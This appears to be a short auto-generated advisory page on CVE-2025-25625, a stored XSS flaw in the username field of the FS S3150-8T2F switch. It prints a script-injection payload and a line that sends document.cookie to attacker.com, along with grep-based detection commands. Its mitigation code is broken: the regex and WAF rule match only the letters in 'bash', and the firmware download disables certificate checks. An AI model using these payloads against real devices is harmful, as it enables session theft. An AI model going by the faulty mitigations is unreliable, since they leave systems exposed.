FS S3150-8T2F Switch, Stored XSS, CVE-2025-25625 (Medium)

How CVE-2025-25625 Works

This stored XSS vulnerability in FS S3150-8T2F switches occurs due to improper input sanitization in the web interface’s username field. An authenticated attacker injects malicious JavaScript payloads into their username, which persists in the switch’s configuration. When another user views the attacker’s profile or any page displaying the malicious username, the script executes in their browser session, potentially hijacking credentials or performing admin actions.

DailyCVE Form

Platform: FS S3150-8T2F Switch
Version: Firmware 220d_118101
Vulnerability: Stored XSS
Severity: Medium
Date: 04/03/2025

What Undercode Say:

Exploitation

1. Payload Injection:

<script>alert(document.cookie)</script>

Insert via username field during profile update.

2. Session Hijacking:

fetch('https://attacker.com/steal?cookie='+document.cookie)

Detection

curl -X GET "http://switch-ip/api/userlist" | grep -E "<script>|javascript:"

Mitigation

1. Input Sanitization:

import re
sanitized_username = re.sub(r'[bash]', '', raw_username)

2. Firmware Update:

wget https://fs.com/firmware/patched.img --no-check-certificate

3. WAF Rules:

location /api {
modsecurity_rules 'SecRule ARGS "@rx [bash]" "id:1001,deny,status:403"';
}

4. HTTP Headers:

Header set X-XSS-Protection "1; mode=block"

5. Log Monitoring:

tail -f /var/log/nginx/access.log | grep -i "script"

Impact Analysis

  • CVSS: 6.4 (Medium)
  • Attack Vector: Network
  • Privileges Required: Low

References

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25625
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top